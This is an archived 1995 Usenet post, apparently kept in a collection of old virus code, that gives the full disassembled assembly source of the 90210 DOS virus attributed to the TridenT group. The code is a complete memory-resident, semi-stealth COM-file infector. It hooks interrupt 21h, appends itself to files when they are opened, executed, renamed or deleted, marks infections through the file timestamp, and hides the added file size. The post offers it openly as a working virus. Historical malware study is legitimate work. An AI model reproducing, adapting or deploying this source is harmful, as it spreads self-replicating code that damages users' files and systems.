90210.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

From smtp Tue Feb  7 13:13 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue,  7 Feb 95 13:13 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9) 
     id NAA30823 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:16:19 -0500
Date: Tue, 7 Feb 1995 13:16:19 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 8866
Content-Type: text
Message-Id: <199502071816.NAA30823@lynx.dac.neu.edu>
To: pobox.jwu.edu!joshuaw 
Subject: (fwd) 90210
Newsgroups: alt.comp.virus
Status: O

Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!usenet.cis.ufl.edu!caen!uwm.edu!news.alpha.net!solaris.cc.vt.edu!uunet!ankh.iia.org!danishm
From: danishm@iia.org ()
Newsgroups: alt.comp.virus
Subject: 90210
Date: 5 Feb 1995 21:55:07 GMT
Organization: International Internet Association.
Lines: 345
Message-ID: <3h3hfr$sb@ankh.iia.org>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]

Here is the 90210 virus:

;90210 Virus from the TridenT virus research group.

;This is a semi-stealth virus that hides file-size changes while
;it is in memory.  It marks the files w/the timestamp.  It will
;infect COM files on open, execute, delete, and rename.  It checks
;if it is in memory by calling Int 21h with DEADh in AX and uses MCB's
;to go memory resident.

;Disassembly by Black Wolf

.model tiny  
.code

		org     100h
  
start:
		push    ax
		call    GetOffset

GetOffset:
		pop     bp
		sub     bp,offset GetOffset-start

		mov     ax,0DEADh
		int     21h                     ;Are we installed?
		cmp     ax,0AAAAh 
		je      DoneInstall

		mov     ax,3521h
		int     21h                     ;Get int 21 address
			   
    db      2eh, 89h,9eh,77h,0h     ;mov cs:[OldInt21-start+bp],bx
    db      2eh, 8ch, 86h, 79h, 0   ;mov word ptr cs:[OldInt21-start+2+bp],es

		mov     ax,cs
		dec     ax
		mov     ds,ax
		cmp     byte ptr ds:[0],'Z'
		jne     DoneInstall         ;Are we the last block in chain?
		
		mov     ax,ds:[3]               ;Get MCB size
		sub     ax,38h                  ;subtract virus memory size
		jc      DoneInstall             ;exit if virus > MCB

		mov     ds:[3],ax               ;Set MCB size
		;sub     word ptr ds:[12h],38h  ;Subtract virus mem from 
		db      81h,2eh,12h,0,38h,0     ;top of memory in PSP
		
		mov     si,bp
		mov     di,0
		mov     es,ds:[12h]             ;Get top of memory from PSP
		push    cs
		pop     ds
		mov     cx,287h
		cld          
		rep     movsb                   ;Copy virus into memory
		
		mov     ax,2521h        
		push    es
		pop     ds
		mov     dx,offset Int21Handler-start
		int     21h                     ;Set int 21h
			   
DoneInstall:
		mov     di,100h
		lea     si,[bp+Storage_Bytes-start]
		push    cs
		push    cs
		pop     ds
		pop     es
		cld 
		movsw
		movsb                           ;Restore Host file.
		mov     bx,offset start
		pop     ax
		push    bx
		retn                            ;Return to Host

  
VirusName       db      '[90210 BH]'
		
OldInt21:                
		dw      0                
		dw      0
		
Int21Handler:
		cmp     ax,0DEADh               ;Install Check?
		jne     NotInstall   
		mov     ax,0AAAAh
		iret 
NotInstall:

		cmp     ah,11h                  ;FCB find first
		je      FCBSearch
		cmp     ah,12h                  ;FCB find next
		je      FCBSearch
		cmp     ah,4Eh                  ;handle find first
		je      HandleSearch
		cmp     ah,4Fh                  ;handle find next
		je      HandleSearch
		
		push    ax bx cx dx si di bp ds es

		cmp     ah,3Dh                  ;handle file open
		je      SetupNameCheck
		cmp     ax,4B00h                ;file execute
		je      SetupNameCheck
		cmp     ah,41h                  ;handle file delete
		je      SetupNameCheck
		cmp     ah,43h                  ;get/set attributes
		je      SetupNameCheck
		cmp     ah,56h                  ;rename file
		je      SetupNameCheck
		
		cmp     ah,0Fh                  ;Open file w/FCB
		je      TryToInfect
		cmp     ah,23h
		je      TryToInfect             ;Get file size
		jmp     ExitInfect
		
FCBSearch:
		jmp     FCBStealth
HandleSearch:
		jmp     HandleStealth

TryToInfect:
		db      89h,0d6h         ;mov     si,dx

		inc     si
		push    cs
		pop     es
		mov     di,offset ds:[Filename-start]     ;Copy filename
		mov     cx,8
		rep     movsb
		mov     cx,3
		inc     di
		rep     movsb

		mov     dx,Filename-start
		push    cs
		pop     ds

SetupNameCheck:
		db      89h, 0d6h        ;mov     si,dx
		mov     cx,100h
		cld 
  
Find_Extension:
		lodsb
		cmp     al,'.'                  ;Find '.'
		je      CheckFilename
		loop    Find_Extension
		db      0e9h, 13h, 0             ;jmp     FilenameBad
CheckFilename:
		lodsw 
		or      ax,2020h                ;Set to lowercase
		cmp     ax,6F63h                ;Is it a com file?
		jne     FilenameBad
		lodsb        
		or      al,20h
		cmp     al,6Dh
		jne     FilenameBad
		db      0e9h, 3, 0              ;jmp     InfectFile 

FilenameBad:
		jmp     ExitInfect 

InfectFile:
		push    dx
		push    ds
		mov     ax,4300h
		pushf         
		call    dword ptr cs:[OldInt21-start]      ;Get Attributes
		mov     word ptr cs:[FileAttribs-start],cx ;Save them
		
		mov     ax,4301h
		xor     cx,cx
		pushf           
		call    dword ptr cs:[OldInt21-start]     ;Reset Attribs to 0
		
		mov     ax,3D02h
		pushf
		call    dword ptr cs:[OldInt21-start]     ;Open file
		jnc     OpenGood
		jmp     FileClosed

OpenGood:
		xchg    ax,bx
		mov     ax,5700h
		pushf              
		call    dword ptr cs:[OldInt21-start]      ;Get file time/date
		mov     word ptr cs:[FileTime-start],cx  ;save time
		mov     word ptr cs:[FileDate-start],dx  ;save date

		and     cx,1Fh
		cmp     cx,1Fh
		jne     NotInfected                    ;Check infection
		db      0e9h, 76h, 0                   ;jmp     Close_File
NotInfected:
		mov     ah,3Fh                  
		push    cs
		pop     ds
		mov     dx,Storage_Bytes-start
		mov     cx,3
		pushf                          
		call    dword ptr cs:[OldInt21-start] ;Read in first 3 bytes

		cmp     word ptr cs:[Storage_Bytes-start],5A4Dh    
		je      DoneWithFile        ;Is it an .EXE file?

		cmp     word ptr cs:[Storage_Bytes-start],4D5Ah
		je      DoneWithFile        ;Alternate EXE sig?

		mov     ax,4202h
		xor     cx,cx
		xor     dx,dx
		pushf        
		call    dword ptr cs:[OldInt21-start] ;Go end of file.
		
		sub     ax,3                        ;Save jump size
		mov     word ptr cs:[Jump_Bytes-start+1],ax
		
		mov     ah,40h                  
		push    cs
		pop     ds
		mov     dx,0
		mov     cx,287h
		pushf          
		call    dword ptr cs:[OldInt21-start] ;Append virus to file
		
		mov     ax,4200h
		xor     cx,cx
		xor     dx,dx
		int     21h                          ;go back to beginning
			   
		mov     ah,40h                  
		mov     dx,Jump_Bytes-Start
		mov     cx,3
		pushf        
		call    dword ptr cs:[OldInt21-start]      ;Write in jump
		or      word ptr cs:[FileTime-start],1Fh ;Mark as infected

DoneWithFile:
		mov     ax,5701h
		mov     cx,word ptr cs:[FileTime-start]   
		mov     dx,word ptr cs:[FileDate-start]   
		pushf                               
		call    dword ptr cs:[OldInt21-start] ;Restore File Date/Time

Close_File:
		mov     ah,3Eh
		pushf          
		call    dword ptr cs:[OldInt21-start] ;Close file
		
		pop     ds
		pop     dx                          ;Pop filename address
		push    dx
		push    ds
		mov     ax,4301h
		mov     cx,ds:[FileAttribs-start]
		pushf             
		call    dword ptr cs:[OldInt21-start]    ;Restore attributes

FileClosed:
		pop     ds
		pop     dx

ExitInfect:
		pop     es ds bp di si dx cx bx ax
		jmp     dword ptr cs:[OldInt21-start]  ;Jump back into Int 21h
  
GetDTA:
		pop     si
		pushf
		push    ax bx es
		mov     ah,2Fh
		call    CallInt21
		jmp     si

FCBStealth:
		call    CallInt21
		cmp     al,0                    ;Did call work?
		jne     NoStealth
		call    GetDTA
		cmp     byte ptr es:[bx],0FFh   ;Extended FCB?
		jne     AfterFCBAdjust
		add     bx,8

AfterFCBAdjust:
		mov     al,es:[bx+16h]          ;Get time stamp
		and     al,1Fh
		cmp     al,1Fh                  ;infected?
		jne     DoneFCBStealth

		sub     word ptr es:[bx+1Ch],287h ;Subtract virus size
		sbb     word ptr es:[bx+1Eh],0    ;adjust for carry
		jmp     short ResetTime

HandleStealth:
		call    CallInt21
		jc      NoStealth 
		call    GetDTA      
		mov     al,es:[bx+16h]              ;Get file time
		and     al,1Fh
		cmp     al,1Fh
		jne     DoneFCBStealth
		sub     word ptr es:[bx+1Ah],287h   ;Subtract virus size
		sbb     word ptr es:[bx+1Ch],0      ;adjust for carry

ResetTime:
		xor     byte ptr es:[bx+16h],10h    ;Restore time to norm.

DoneFCBStealth:
		pop     es bx ax
		popf
  
NoStealth:
		retf    2 

CallInt21:
		pushf
		call    dword ptr cs:[OldInt21-start]
		retn

Storage_Bytes:                
		nop
		int     21h
		
Filename        db      8 dup (0)
		db      '.'
Extension       db      3 dup (0)
		db      0

FileAttribs     dw      0
FileTime        dw      0
FileDate        dw      0

Jump_Bytes      db      0E9h, 00h, 00h

AuthorName      db      ' John Tardy / TridenT '

end     start


--
Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
The Great Sporkeus Maximus			     ekilby@lynx.dac.neu.edu
Student at the Northeatstern University College of Computer Science 
"I Can't Believe It's Not Butter"